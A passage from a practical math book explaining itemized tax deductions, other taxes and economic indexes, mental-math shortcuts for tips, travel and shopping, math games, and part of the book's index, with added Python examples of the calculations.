is to determine whether your deductions exceed the standard 
deduction amount. It’s simple addition and comparison: Add up all 
your individual deductions, compare that amount to the standard 
deduction amount, and go with the one that’s higher. 


What’s not so easy is determining which and how much of the 
potential individual deductions you can take. To itemize, you use 
IRS Form 1040 Schedule A (Figure 14-2 shows the top part of this 
form). 


Schedule A (Form 1040), Itemized Deductions, 2011, Department of the Treasury, Internal Revenue Service. The top part shown covers Medical and Dental Expenses (line 1, medical and dental expenses; line 2, amount from Form 1040, line 38; line 3, line 2 multiplied by 7.5% (.075); line 4, line 1 minus line 3, or 0 if line 3 is more than line 1) and the start of Taxes You Paid (line 5, state and local income taxes or general sales taxes).


Figure 14-2: IRS Form 1040 Schedule A.


The Schedule A deductions fall into several categories. The 
following list summarizes each category and what it takes to meet 
the deduction floor, or threshold. 


A floor (also called a threshold) is a level below which no deduction
is allowed. Different deductions have different floors. For example,
job expenses and miscellaneous deductions are deductible only
to the extent that they exceed 2 percent of your AGI. Below that,
you get nada. For example, if you have an AGI of $20,000, 2 percent
is $400 (simply multiply your AGI by 0.02). You may have $600 in
job expenses, but you don’t get $600 as a deduction. You get the
amount over $400, or $200.


Medical and Dental Expenses: You can claim medical and
dental expenses, but here’s the catch: You can deduct only
the amount by which your total medical care expenses for
the year exceed 7.5 percent of your AGI. (Don’tcha just love
it? Some of those medical expenses you thought were
deductible probably aren’t, due to the threshold.) To determine
how much expenses exceed the threshold, multiply your AGI
by 0.075 to determine the floor. You can deduct any medical
expenses over that amount.


The math you use here is entirely about calculating the floor
and subtracting it to get your allowable medical expense
deduction.


Taxes You Paid: Here’s the place to enter a variety of taxes,
such as state income taxes, sales taxes, real estate taxes, and
personal property taxes. Check with your tax advisor. Then
add them all up.


Interest You Paid: Homeowners get excited about this section.
That’s because most homeowners have a big interest
component in their mortgage payments. The lender will send
you a Form 1098, which gives you the amount of interest you
paid. The home mortgage interest deduction is America’s
favorite tax deduction. It’s usually big, and the lender does
the math for you.


If you rent, you pay the rent, but the landlord takes the 
mortgage interest deduction. 


Gifts to Charity: Most charitable donations are small amounts
of cash or are represented by a receipt for the items you
donate to a charity thrift store.


If you’re giving vast amounts of stock or property to charity, 
you definitely need to talk to a tax professional because how 
much charitable giving you can deduct is subject to many 
rules. There are often limitations regarding what you can give. 


Casualty and Theft Losses: Generally, you can deduct losses
to your home, household goods, and motor vehicles. But, of
course, limitations exist if you have insurance — and most
people have automobile, homeowner’s, or renter’s insurance,
if they can afford it. To figure it all out, you need an instruction
pamphlet from the IRS, and you need to attach a special
form (Form 4684) to your tax return. You can see the form at
http://www.irs.gov/pub/irs-pdf/f4684.pdf.


Job Expenses and Certain Miscellaneous Deductions:
Some employee job expenses — travel, union dues, and job
education — are deductible. You need to attach Form 2106 or
Form 2106-EZ. Again, your math is simple. Just list the items
and add them up.


By the way, tax preparer fees are deductible, too. So’s a safe 
deposit box and other such items. 


Other Miscellaneous Deductions: “Other” deductions can be
an adventure. For example, a horse is likely to be disallowed
as a “hobby expense,” unless you’re in the horse business.
It doesn’t matter how much Flicka, Black Beauty, or Stripes
costs you in maintenance and training. Bottom line: Do your
research and ask your tax professional. Then list the allowable
items and add them up.


As they say in Hollywood, “It’s a wrap!” Total the deductions from 
the various sections. The real-life math is just to add everything up 
and move the number over to the correct line on Form 1040. 
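

The itemize-or-not comparison and the taxable income formula from this chapter, worked through as an added Python example (it is not from the book). It uses only the 2011 amounts and the two floors quoted above; the function names and the two sample households are constructed for illustration, and casualty losses and "other" miscellaneous deductions are left out because the chapter gives no rule for them.

```python
from decimal import Decimal

# 2011 amounts quoted in this chapter; they change every year.
STANDARD_DEDUCTION = {"single": Decimal("5800"), "married_joint": Decimal("11600")}
EXEMPTION_AMOUNT = Decimal("3700")
MEDICAL_FLOOR_RATE = Decimal("0.075")   # medical and dental: 7.5 percent of AGI
JOB_MISC_FLOOR_RATE = Decimal("0.02")   # job and miscellaneous: 2 percent of AGI
ZERO = Decimal("0")


def _d(amount):
    """Convert an int, float, or str dollar amount to Decimal without float noise."""
    return Decimal(str(amount))


def over_floor(expenses, agi, floor_rate):
    """Deductible part of an expense: only the amount above floor_rate * AGI."""
    floor = _d(agi) * floor_rate
    return max(ZERO, _d(expenses) - floor)


def itemized_total(agi, medical=0, taxes_paid=0, interest_paid=0, charity=0, job_misc=0):
    """Add up the Schedule A categories described in this chapter."""
    return (
        over_floor(medical, agi, MEDICAL_FLOOR_RATE)
        + _d(taxes_paid)
        + _d(interest_paid)
        + _d(charity)
        + over_floor(job_misc, agi, JOB_MISC_FLOOR_RATE)
    )


def choose_deduction(agi, filing_status, **schedule_a):
    """Compare itemized deductions with the standard deduction; take the higher."""
    standard = STANDARD_DEDUCTION[filing_status]
    itemized = itemized_total(agi, **schedule_a)
    if itemized > standard:
        return "itemize", itemized
    return "standard", standard


def taxable_income(agi, deduction, exemptions):
    """taxable income = AGI - deductions - exemption amount (the form enters 0, not a negative)."""
    return max(ZERO, _d(agi) - _d(deduction) - exemptions * EXEMPTION_AMOUNT)


def tax_after_credits(tax, credits):
    """Subtract the summed credits from the tax; a negative result is entered as 0."""
    return max(ZERO, _d(tax) - sum((_d(c) for c in credits), ZERO))


def worked_examples():
    """Two constructed households (sample figures, not from the book)."""
    results = {}
    # Homeowner, single, AGI $60,000: mortgage interest pushes past $5,800.
    method, amount = choose_deduction(
        60000, "single",
        medical=5000, taxes_paid=3000, interest_paid=7000, charity=400, job_misc=1000,
    )
    results["homeowner"] = (method, amount, taxable_income(60000, amount, 1))
    # Renter, single, AGI $20,000, $600 of job expenses: only $200 clears the floor.
    method, amount = choose_deduction(20000, "single", job_misc=600)
    results["renter"] = (method, amount, taxable_income(20000, amount, 1))
    return results


if __name__ == "__main__":
    for name, (method, amount, taxable) in worked_examples().items():
        print(f"{name}: {method} ${amount:,.2f}, taxable income ${taxable:,.2f}")
```
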


Observing Other Taxes 


As Ben Franklin noted, nothing is certain but death and taxes. And 
taxes of all kinds have been around for a long time. Taxes come in 
many forms, and you can easily calculate them if you know how. 


Surveying sales tax 


A sales tax is a percentage-based tax charged on the goods and 
services you buy. Almost all purchases (except some Internet 
sales) require that you pay sales tax. Sales taxes are state taxes, 
sometimes with a local tax added on. 


In the United States, sales tax rates vary from 0 percent (New 
Hampshire, Delaware, Oregon, Montana, and Alaska) to 7.50 percent 
(California). 


Although you can see how much you've paid in sales tax just by 
checking the tax line on your grocery receipt or restaurant check, 
occasionally you want to know how much tax you'll owe before 
you make a purchase. In that case, simply take the cost of the item 
and multiply it by the sales tax percentage. If you’re buying a $139 
dress and sales tax is 7 percent, use this equation: $139 x 0.07 = $9.73. 
See Chapter 5 for the details on sales tax. 


Processing property tax


Property tax is a local tax that homeowners pay and that is 
assessed by the county assessor. (Renters pay property tax, too, 
because landlords pass it on to them in the monthly rent.) 


The actual amount you pay for property tax depends on your
local tax rate (in California where I live it’s 1.25 percent) and the
assessed value of your home. For a $200,000 home in California, for
example, you calculate taxes as follows:


tax = assessed value x 1.25 percent 
tax = $200,000.00 x .0125 
tax = $2,500.00 


Many mortgage companies include property taxes in your monthly 
mortgage payment and keep the amount in escrow until a tax 
payment becomes due. If you own your home outright, however, 
the tax bill comes directly to you. Also keep in mind that property 
taxes are often levied twice a year. To determine what you'll have
to pony up each six months, simply divide your yearly tax burden by
2. If your annual property tax burden is $2,500, for example, you
will pay $1,250 every six months. If you have an escrow account,
about $208 of your monthly payment goes into it ($2,500 ÷ 12).


Fee, fie, foe, fum 


Whereas a tax is for the general fund and has no direct connection 
with individual benefits, a government fee is money you pay for 
specific, directly beneficial goods or services. For example, a user 
fee, such as the one you pay to get into a national park, benefits 
you directly. If you don’t want to go to the national park, you don’t 
have to pay the fee. 


Don’t be misled by someone who calls everything, including fees, 
“taxes” — for example, insisting that bridge and tunnel tolls are 
taxes. They aren’t. The reverse is sometimes true: Every once in 
a while, a state or local government tries to call a tax a fee. That’s 
understandable, because a lot of people are tax-averse, but it’s 
wrong, and the courts usually call them on it. 


Following are some common fees:


Motor vehicle fees: If you own a vehicle, you very likely 
pay registration fees every year to the Department of Motor 
Vehicles. In California (where I live and where we worship 
cars), a typical vehicle renewal notice bills out several fees, 
like registration fees, license fees (which you may get an 
income tax deduction for), fees for personalized license plates 
(called vanity plates), and so on. 


Licenses and permit fees: Sometimes a fee is part of a license 
or permit application. You can pay fees for building permits, 
demolition permits, logging permits, entry to the landfill, 
business licenses, and so forth. Fishing and hunting license 
fees fall into this category, too. 


The math involved in figuring out what fees you owe is pretty 
simple: Find out what the current fee is, add in any subcomponents 
of the fee, and then add them up. For example, a California fishing 
license not only has the basic sport fishing component, but 
additional subcomponents for fishing in the ocean, using a second 
rod, fishing in the Colorado River, taking abalone, taking salmon in 
the northern rivers, taking steelhead, and taking spiny lobsters. 


Making sense of government indexes 


An index is a set of numbers, usually created by statisticians and evaluated by 
economists. 


The U.S. government has many indexes, and they are mainly money-related numbers. 
In government indexes, math and civics merge: These numbers are bandied about 
and used to justify all sorts of policy decisions and to characterize how well or 
poorly the U.S. is doing. By understanding what these terms mean and how the 
numbers are calculated, you can better evaluate the info you're getting. 


Gross National Product (GNP): The GNP is the market value of all the “output” 
(products and services) produced in a year. It considers all the property and 
labor of the country’s residents, but it doesn’t care whether the enterprises 
are in the U.S. or abroad. So, if Apple makes iPads in China or HP makes PCs in 
Indonesia, that’s part of the GNP. GNP was a hot number until 1991. Now GDP 
is used more frequently. 


Gross Domestic Product (GDP): GDP is the market value of all goods and services 
produced within a country in a period. A big growth rate is better than a small one, 
or a negative one. For example, India is doing fine with a GDP growth rate of 7.8 
percent; the United States is recovering from a recession and has a growth rate of 
1.7 percent; and Portugal is in big trouble with a growth rate of —2.2 percent. 
By the way, the United States has the biggest economy in the world, with a GDP
of $14.447 trillion. China is #2, with a GDP of $5.739 trillion.


GDP per capita: This is a measure of a country’s standard of living. It's a 
country’s GDP divided by the country’s population. You can find lists of GDP per 
capita on the Internet. Take a look. You might be surprised that Luxembourg 
gets the top spot, with a GDP per capita of $113,533 USD. Where’s the good old 
U.S. of A? A bit down the list at number 14, with $48,387 USD per person. 


Per capita income: Per capita income (or income per person) is the average 
income of a country, a state, or a city. “Per capita” means “per head.” To 
get per capita income, you take all sources of income and divide it by the 
population. Per capita income is a very rough measure of prosperity, and it 
doesn’t show distribution. Therefore, it doesn’t say anything about individual 
people, rich or poor. 


Inflation rate: The inflation rate is the annual rate of increase in the consumer 
price index (CPI). If prices go up, say, 3 percent in a year, the inflation rate is 
3 percent. An example of inflation at work is when, over time, a loaf of bread 
increases in price from $2.00 to $4.00. Your bucks can't buy all the bread they 
used to, so you might also say that your purchasing power (the amount of goods 
or services you can buy with a unit of currency) has gone down. Of course, if 
your income goes up as prices go up, your purchasing power isn't diminished. 
You don’t feel the pain (as much). That's “keeping up with inflation.” 


A famous American myth claims that a young George Washington threw a 
silver dollar across the Potomac River and inspired a very old joke from a 1942 
Looney Tunes cartoon: “Why couldn't he do it today? Because a dollar doesn't 
go as far as it used to.” 


Unemployment rate: The unemployment rate measures unemployment and is the 
percentage of the workforce that’s not working, willing and able to work, and 
actively looking for work. In the United States, the unemployment rate doesn't 
reflect those working part time (the underemployed) and those who have given 
up looking for work after months or years of being unable to find a job. 


The unemployment rate is calculated by dividing the number of unemployed 
workers by the total number of workers in the workforce and then multiplying that 
value by 100. For example, if a country with 300 million people has a workforce 
of 150 million people and 12 million people are unemployed, the unemployment 
rate is 8 percent (12 ÷ 150 × 100). 


Consumer price index: The U.S. Consumer Price Index (CPI) shows changes 
in the price level of goods and services you buy. It's the main measure of inflation. 
Every month, the Bureau of Labor Statistics determines the CPI by looking 
at consumer goods and services, like housing, clothing, energy, and utilities. 
A low monthly CPI change (an increase of 0.3 percent, for example) is a good 
thing, as it means that prices are not rising fast. 
Part IV 
The Part of Tens 


The 5th Wave By Rich Tennant 


“Okay — let’s play the statistical probabilities of this situation. 
There are 4 of us and 1 of him. Phillip will probably start screaming, 
Nora will probably faint, you'll probably yell at me for leaving the 
truck open, and there’s a good probability I’ll run like a weenie if 
he comes toward us.” 


In this part... 


The world loves lists of ten things, and in these chapters you find 
a bunch of fun and useful information in a very small space. Here I 
list quick calculations you can do in your head and fun games and 
activities that build or use your math skills and sharpen your 
critical thinking. 


Chapter 15 


Ten Quick Calculations You 
Can Do in Your Head 


In This Chapter 


Calculations that come in handy on the road 


Estimating taxes and tips on the fly 
Easy ways to determine pizza, paint, and other amounts 


When a real-life math problem comes up, you may not have 
a calculator handy or the situation doesn’t lend itself to 
using one (like when you're driving or when you're figuring the tip 
at a business lunch). Even if you do have one handy, the easiest 
and most efficient way to solve many math problems is in your 
head. Although not all math problems lend themselves to mental 
math, there are some handy calculations you can keep in your 
head. Here are ten of them. 


Miles to Kilometers 


To convert from kilometers to miles, you first need to know that 
1 km = 0.62 mi (actually, it’s really 0.621371, but don’t worry about 
the other decimal places). Say you leave Amsterdam to visit 
Haarlem, a trip of 20 km. If 1 kilometer equals about 0.62 miles, 
then 10 km = 6.2 mi. Double that, and you’ll see that the 20 km trip 
is 12.4 mi. 


To go from miles to kilometers, divide the distance in miles by 
2 and then add that number back to the original distance. For 
example, say your destination is 28 miles away. Divide 28 by 2 to get 
14, and then add 14 back to the original number of miles (28). The 
answer: 42. (If you’re interested, 1 mi = 1.60934 km. In this method, 
you're multiplying by 1.5, not the actual conversion factor of 1.6, 
but it’s close enough.) 
Miles to Your Destination 


When you’re driving, you can find the distance to your destination 
in three ways: You can look at the distances on the highway 
signs. You can enter your destination into your GPS and check it 
periodically to see how far you have left to go. Or you can do a 
little mental math: Before traveling, look up how far it is to your 
destination (you can use an online map program, like Google 
Maps — https://maps.google.com) and set your trip odometer 
to 0. As you drive, subtract the miles on the trip odometer (how far 
you’ve traveled) from the total distance you know you will travel. 


Time to Destination 


When you’re driving, the easy answer to the question “Are we 
there yet?” is “No.” A harder question to answer is, “When will we 
get there?” To find the time to your destination, you just need to 
know distance and speed, because time = distance ÷ speed. 


For example, suppose that the road sign says your destination is 
180 miles away, and your speedometer says you’re moving along 
at about 60 miles per hour. Divide distance (180 miles) by speed 
(60 miles per hour) to get time (3 hours). Of course, for other 
distances and speeds, the calculations are harder, but the formula 
is the same. 


Sales Tax and VAT 


In many parts of the United States, sales tax on purchases is over 
8 percent. To be safe, estimate it at 10 percent. To find out how 
much tax you'll pay on an item, just divide the item’s price by 10 
(move the decimal over 1 place to the left). For a $15.00 item, for 
example, the result is $1.50. 


Many countries have a value added tax (VAT), and you use the 
same kind of math to figure those. The VAT is usually about 
20 percent of the price of an item. To estimate the VAT, first divide 
the price by 10 (for a €50.00 item, for example, that’s €5.00) and 
then double it. The VAT on the €50.00 item will be €10.00. 


Tips 


To leave a 15 percent tip, you simply figure out what 10 percent of 
the check is (move the decimal to the left 1 place), what 5 percent 
of the check is (halve the 10 percent value), and then add the 
numbers together. For example, a $23.00 check divided by 10 is 
$2.30. Divide that amount by 2 to get $1.15. Now add the two 
numbers together: $2.30 + $1.15 = $3.45. 


To leave a 20 percent tip, move the decimal place over 1 spot 
to determine what 10 percent of the bill is and then double that 
amount. For example, 10 percent of a $55.00 check is $5.50. Double 
that to get $11.00. Easy peasy. 


How Much Paint to Buy 


To figure out how much paint to buy, first divide the area a gallon 
will cover (you can get this information off the paint can) by the 
height of a room. This gives you the number of linear feet the 
gallon will cover. If the paint covers 400 square feet and your walls 
are 8 feet high, you know that a gallon is enough to paint 50 linear 
feet. Next, measure the perimeter of the room. For a 9 foot by 12 
foot room, for example, the perimeter is 9 + 9 + 12 + 12 feet, or 42 
feet. If a gallon covers 50 linear feet, you know that one gallon will 
do the job with some paint left over. You can extend this to multiple 
rooms. Just add all the perimeters together and count on using 
1 gallon of paint for every 50 linear feet. 


Number of Pizzas to Buy 


Pizza is a favorite food when you're feeding a bunch of people, 
whether it’s your kid’s Little League team or a project team that’s 
working late on a deadline. The math comes in when you have to 
determine how many pizzas to buy. Simply figure out how many 
pieces total your group is likely to eat and then divide that number 
by the number of slices in a pizza. 


Here’s an example: Say you’re taking 12 kids from your youth 
soccer team out for pizza. You figure that each kid will eat 2 pieces, 
so you know you need 24 pieces of pizza (12 × 2 = 24), and a 
typical 14-inch pizza has 8 slices. By dividing the total number of 
slices needed by the number of slices in a pizza, you know you 
need 3 pizzas (24 ÷ 8 = 3). You can use the same kind of calculation 
to figure out how much cake to buy for a wedding shower, how 
many boxes of juice to buy for your kid’s class party, and other 
similar scenarios. 


Blood Alcohol Content (BAC) 


In most states, driving with a blood alcohol content (BAC) — the 
percentage of alcohol in your blood — of 0.08 percent or higher 
will get you in serious trouble. So how much can you consume 
before you cross the legal drinking threshold? 


A 12 ounce can of beer, a 5 ounce glass of wine, and a 1 ounce shot 
of alcohol all have about the same impact on your BAC. They each 
add about 0.02 percent to your BAC. The smart math here is to 
go to your state’s Department of Motor Vehicles website and find 
a BAC chart. These charts usually show gender, weight, and the 
number of drinks that will mess you up. Memorize the numbers 
that apply to you, and should you drink, count your drinks and 
then stop. Also, you can find a very good online BAC calculator at 
http://bloodalcoholcalculator.org. 


Never operate a motor vehicle (including a boat) if you’re impaired 
by alcohol. The idea is to drink very moderately, if at all. You’ll be 
a safer driver, and you’ll avoid an arrest for driving under the 
influence (DUI) or driving while impaired (DWI). 


Dollars to Pounds or Euros 


The exchange rate between currencies changes a little every day, 
but in general, a pound (£ or GBP) is worth about $1.50 and a 
euro (€ or EUR) is worth about $1.20. To convert from euros to 
dollars, multiply any price by 1.2. For example, if you see an item 
priced at €10.00, that’s the equivalent of $12.00 (10.00 x 1.2 = 12.00). 
A €25.00 item works out to be $30.00. To convert from pounds to 
dollars, multiply the price by 1.5. For example, if you see an item 
priced at £10.00, that’s the equivalent of $15.00 (10.00 x 1.5 = 15.00). 
A £25.00 item is $37.50. 


If you carry a smartphone that works in Europe, use a currency 
converter app to find the exact exchange rate. Or you can just ask 
the staff at your hotel. 


Gas Mileage 


You can estimate gas mileage two ways: The first way is to divide 
the miles you can drive on a tank of fuel by the capacity of the 
tank. But this method is imprecise for a variety of reasons, two 
being that you never really know what a “full” tank is and it doesn’t 
account for driving conditions. 


A quick and easy way to calculate miles per gallon is to do a little 
test run. Say you have a 12-gallon gas tank (info you can get from 
your owner’s manual). Fill the tank up, set your trip odometer to 
zero, and take a short day trip. When the fuel gauge registers 3/4, 
look at the trip meter to see how far you’ve gone. If the gauge says 
90 miles, you have driven 90 miles on 1/4 tank of gas, or about 
three gallons. Divide 90 by 3 to find that you're getting about 30 mpg. 


Chapter 16 


Ten Activities That Build 
Math Skills 


In This Chapter 


Performing powerful parlor tricks 
Doing what is logical, Captain 
Solving math puzzles and playing math games online 


Man (and woman) doth not live by bread alone. That is, life 
involves more than work and chores. So what do you do 
with your leisure time? When there’s nothing on TV, try reading 
and games. Reading entertains, educates, and edifies. However, 
math games help to make you a math whiz. Here are ten games and 
math-related activities that can get you there. 


Playing Sudoku 


Sudoku is a number placement puzzle that requires logic and a 
quick grasp of the numbers 1-9. There’s no adding, subtracting, 
or any other math operation. You simply have to determine what 
number is and isn’t in a row, column, or subregion. It’s as simple as 
tic-tac-toe, but it’s an excellent challenge for the thinking person. 


The easy Sudoku games are fast; the hard ones, not so much. You 
can find Sudoku puzzles in the newspaper, online, in apps for 
smartphone or tablet, and even in in-flight magazines on the airline. 


Playing Elementary Math 
Games on the Internet 


You could go to many Internet sites to learn math rules, formulas, 
and step-by-step procedures. But life is short, so instead play some 
math games. Visit http://www.coolmath-games.com. 


Here you'll find money games, number games, logic games, and 
much more. All free! And if you think these “children’s” games are 
easy to master, try playing a few. Even “Lemonade Stand” can be a 
difficult business resource management exercise. 


Working through Logic Puzzles 


You may have grown up with logic puzzles (you know, the kind 
that asks you to match up people with houses and pets). The 
typical result is something like “The Swede lives in the red house 
and owns a dog.” At first, these games strain your brain, as they 
should. Later, your skills reduce the pain and you get a gain. 


Try Sherlock, one of the best of the logic puzzles. Sherlock and 
many other logic games are at Everett Kaser’s website 
(http://www.kaser.com). In my opinion, he’s the undisputed master of 
logic puzzles. 


Noting the Birthday Paradox 


The Birthday Paradox isn’t so much a game as a statistical 
probability that will baffle and amaze your friends. Basically, this 
paradox states that, in a room full of people, there’s an excellent 
chance that two of them have the same birthday. When you have 
367 people in the room, the probability is 100 percent, because 
there are at the most 366 days in a year. Interestingly, probability 
calculations show that the likelihood of a match is 99 percent when 
only 57 people are in the room. And you might win a bet or two 
knowing this: The probability is 50 percent when only 23 people are in 
the room. 


That 50 percent probability is as good as a coin flip, but the 
birthday paradox is much more dramatic! 
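

The probabilities quoted above can be checked directly. The following Python sketch is an added example, not part of the original book; it assumes a 365-day year with every birthday equally likely, and the function names are made up for the illustration.

```python
from fractions import Fraction

DAYS = 365  # assumption: ignore leap days, every birthday equally likely


def shared_birthday_probability(people: int, days: int = DAYS) -> float:
    """Probability that at least two of `people` share a birthday."""
    if people > days:
        return 1.0  # more people than days: a match is guaranteed
    # Easier to compute the chance that everyone is different,
    # then subtract it from 1.
    all_different = Fraction(1)
    for already_in_room in range(people):
        # The next person must avoid every birthday already taken.
        all_different *= Fraction(days - already_in_room, days)
    return float(1 - all_different)


def smallest_group_for(target: float, days: int = DAYS) -> int:
    """Smallest room size whose match probability reaches `target`."""
    people = 1
    while shared_birthday_probability(people, days) < target:
        people += 1
    return people


if __name__ == "__main__":
    for n in (10, 23, 57):
        print(f"{n:>3} people: {shared_birthday_probability(n):.1%}")
    # With 366 possible days, 367 people force a match.
    print("367 people, 366 days:", shared_birthday_probability(367, 366))
    print("50% reached at", smallest_group_for(0.50), "people")
    print("99% reached at", smallest_group_for(0.99), "people")
```
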


Knowing the Value of Pi 


Knowing the mathematical constant pi (π) may not have a lot of 
practical uses unless you’re a mathematician or a scientist, but it 
puts you in a relatively small group of people who, upon hearing 
the word “pi,” don’t think immediately of apple or pecan. 


Here are three things that any self-respecting pi lover needs to 
know: First, pi allows you to calculate the areas and circumferences 
of circles and the volumes of cylinders and spheres. Second, pi’s 
value is approximately 3.14, but no one knows the exact value 
of pi because the decimal places go on forever. (If you want extra 
credit, memorize pi to 12 decimal places: 3.141592653589.) Third, 
March 14th (3/14) of every year is National Pi Day. 


Guessing a Friend’s Age 


Using a technique called a binary search, which comes from 
computer science, you can guess a friend’s age in a maximum of 
seven tries. To start, tell a friend, “I can guess your age in seven 
guesses or less. I’ll name a number, and you say ‘high,’ ‘low,’ or ‘yes.’” 


Start in the middle of a range of age values. If you were using the 
ages 1-64, you’d start with 32 and then continue to halve the 
search range at every “high” or “low” response. 


Say for example that, when you say “32,” your friend says “Low.” 
You halve the search range (which now becomes 33-64) and pick 
the number in the middle of the new range: “48.” If the answer isn’t 
“yes,” halve the search range again. Worst case, it'll take you seven 
guesses to get to the right age. 


You can guess the age in even fewer tries if the person is obviously 
not a child or teenager. Start the search range at age 20. 
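

The guessing game above, written out as a short Python sketch. This is an added example, not part of the original book; the function names are made up for the illustration, and the friend is assumed to answer truthfully, with "low" meaning the guess was too low.

```python
def guess_age(secret_age: int, low: int = 1, high: int = 64) -> list[int]:
    """Play the game against a friend whose age is `secret_age`.

    Returns every number called out, in order; the last one is the age.
    """
    if not low <= secret_age <= high:
        raise ValueError("age is outside the agreed range")
    guesses = []
    while low <= high:
        guess = (low + high) // 2   # middle of what is still possible
        guesses.append(guess)
        if guess == secret_age:     # friend says "yes"
            return guesses
        if guess < secret_age:      # friend says "low": drop guess and below
            low = guess + 1
        else:                       # friend says "high": drop guess and above
            high = guess - 1
    raise AssertionError("unreachable when the friend answers truthfully")


def worst_case(low: int, high: int) -> int:
    """Most guesses needed for any age in the range low..high."""
    return max(len(guess_age(age, low, high)) for age in range(low, high + 1))


if __name__ == "__main__":
    print("Age 40:", guess_age(40))                 # opens with 32, then 48
    print("Worst case, ages 1-64:", worst_case(1, 64))
    print("Worst case, ages 20-64:", worst_case(20, 64))
```
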


Playing Hidden Object Games 


A hidden object game (HOG) is a type of computer game where 
you have to find items from a list that are hidden in a scene, and 
there are numerous scenes. Finding the objects advances a story, 
and in the story, you need to place found objects to make something 
happen. The big game is interspersed with fun mini-games, too. 


If a hidden object game doesn’t test your investigative, reasoning, 
and sequencing skills, it’s hard to say what will. 


The games are very inexpensive, and you can extend play over 
hours or days. You can find these games in lots of places, but one of 
the best is Big Fish Games. Visit http://www.bigfishgames.com. 


Flipping Coins 


Flipping a coin consists of tossing a coin into the air so it rotates 
several times. In some games, a participant “calls” it in the air as 
coming up “heads” or “tails.” Play a simple (almost mindless) game 
to learn a lesson in probability. 


Flipping a coin has two outcomes — heads or tails. The probability 
of one side coming up is 1 in 2, or 50 percent. Flip a coin a few 
dozen times, and you'll see that each side comes up about half the 
time. So what happens if the coin comes up heads 100 times in a 
row (for example)? That must mean that the next flip has to be 
tails. Nope, the various flips are each independent events, so the 
probability is 50 percent every time. 


The Romans called coin flipping navia aut caput (“ship or head”), 
because that’s what was on their coins. They considered the 
outcome to be an expression of divine will. Today, a coin flip (“the 
toss”) is used in football games to decide which team gets first use 
of the ball. 


Playing Games with Your Kids 


Even very young children benefit from math games, and when 
you help them, you improve your skills, too. Begin with simple 
sequencing games, such as “This Little Piggy” (“This little piggy went 
to market; this little piggy stayed home...” and so forth). Later, 
you and your child can sing “This Old Man,” (“This old man, he 
played one, he played knick-knack on my thumb”) together. After 
that, use Sesame Street counting games to help teach both math 
skills and computer skills. Visit 
http://pbskids.org/games/counting.html. 


Playing Angry Birds 


Angry Birds is one of the most popular games for smartphones and 
tablets ever made. Over 12,000,000 copies have been purchased at 
the Apple App Store, and it’s available for Android devices, too. 


Angry Birds is excellent for developing your mental math skills, 
and you won't even know you’re doing so. You figure trajectories 
without thinking very much about them. Economy is important, 
too, as you get more points for knocking down the pigs’ structures, 
using as few birds as possible. 


Who knew that shooting wingless birds at pigs using a slingshot 
would excite so many people? And the “purchase” price is $0.00, 
unless you upgrade. 
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© Special Characters 
and Numerics ° 


. (dot) symbol, 31 
n (pi) 
as a constant, 29 
defined, 42 
value of, 251 
y (square root), 31 
2r (diameter), 40-41 
12b-1 fee, 197 
21/blackjack game, 157-158 
401 (k) contribution plan, 193-194 
403 (b) contribution plan, 193-194 
529 plan (education savings plan), 182 


eAe 


accounting, 223-224 
acute angle, 38 
acute triangle, 39-40 
adding 
commutativity in, 11 
defined, 11 
fractions, 15 
numbers, 11 
tips for, 60-61 
variables, 31 
addition. See adding 
adjustable rate mortgage (ARM), 171 
AGI (adjusted gross income), 231-232 
alcohol 
calorie content of, 117 
measuring BAC, 246 
algebra 
constants, 29 
equations, 30-35 
expressions, 29-30 
overview, 27-28 
variables, 28-29 
algebraic equations 
adding and subtracting variables, 31 
defined, 30 
multiplying and dividing variables, 31 


order of operations, 33-34 
powers, 31 
solving, 32-33 
square roots (y), 31 
American system, measurement, 
50-51, 98 
amortization, 174-175 
angles, types of, 38 
Angry Birds, 253 
annual percentage rate (APR), 180 
Apache OpenOffice website, 165 
appreciation (investment), 185 
APR (annual percentage rate), 180 
area, 24-25, 41-42, 130-131 
arithmetic mean, 52, 66 
ARM (adjustable rate mortgage), 171 
ATM (debit card), 87, 169 
auto insurance, 209-210 
average 
bowling, 66-67 
defined, 52, 66 
formula, 52 
grade point, 68-69 
versus median, 53 
misuse of, 68 
steps for finding, 52 
axes, 36 


e Beo 


BAC (blood alcohol content), 246 
back-end load, 197 
balance, financial, 168, 180 
balancing checkbook, 167-170 
bank card. See credit card 
bar graph, 22 
basic operations. See adding; dividing; 
multiplying; subtracting 
betting 
best in craps, 159 
bets, types of, 155 
blackjack/21, 157-158 
counting cards, 158 
house edge/advantage, 155-156, 
159-160, 188 
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betting (continued) 
hunch play, 158 
insurance, 158 
odds, 154 
payout, 156 
roulette, 156 
slot machine/one-armed bandit, 
156-157 
worst casino, 160 
big box stores, 94-96 
Big Six (Wheel of Fortune), 160 
binary search, 251 
Birthday Paradox, 250 
blackjack/21game, 157-158 
blood alcohol content (BAC), 246 
BMI (body mass index) website, 121 
bond/bond funds, 184, 197, 201-202 
bowling, 66-67 
box, 43 
boxcars (roll of dice), 159 
broker, 199 
budget, 163-167 
bulk buying, 106-107 
business 
accrual basis accounting, 224 
cash basis accounting, 224 
costs, 218 
deductions, 226-227 
discounts, 217 
expenses, 218 
gross pay, 224-225 
gross profit, 219 
income, 218 
IRS website, 228 
making change, 220-221 
markups, 216-217 
net pay, 226-227 
net profit, 220 
payroll deduction formula, 
226-227 
pre-tax profit, 220 
profit margin, 219 
project accounting, 223-224 
selling price, 215-216 
time, classes of, 225 
time and materials, 217-218 
time clock, 222-223 
timesheet, 221-223 


tracking time, 221-223 

W-4, 227-228 

withholding pay, 227-228 
business line (insurance), 209 
buydown (interest), 172 
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c (circumference), 40—42 
calculating formula. See formula, for 
calculating 
calories 
burn rate, 122-124 
calculating, tips for, 115-116 
defined, 115 
empty, 113 
formula for calculating, 115 
formula for losing weight, 117-118 
per serving on label, 112 
in processed foods, 113 
recommended daily, 111, 113-114 
in various foods, 110, 115, 117 
websites, 114, 116-117 
car insurance, 209-210 
car loan, 176-177 
carbohydrates, 110, 117 
Cartesian coordinate system, 36 
cash basis accounting, 224 
cash value (insurance), 213 
CD (certificate of deposit), 181 
Celsius to Fahrenheit, converting, 51 
Center on Budget and Policy 
Priorities website, 22 
certificate of deposit (CD), 181 
charge-a-plate, 177 
chart/graph, 20-22 
check (payment), 87 
checkbook 
balancing, 168-170 
using register, 168-170 
using symbols in register, 169 
CHG (monthly fees), 169 
circle 
area, calculating, 42 
defined, 40 
parts of, 40-41 
perimeter, finding, 43 
circumference (c), 40—42 


Class A/B/C shares (mutual funds), 
197-198 
closeout/clearance sale, 80 
co-insurance, 204 
comeout roll (roll of dice), 159 
commission, 199 
common denominator, 15 
common fraction, 12-13 
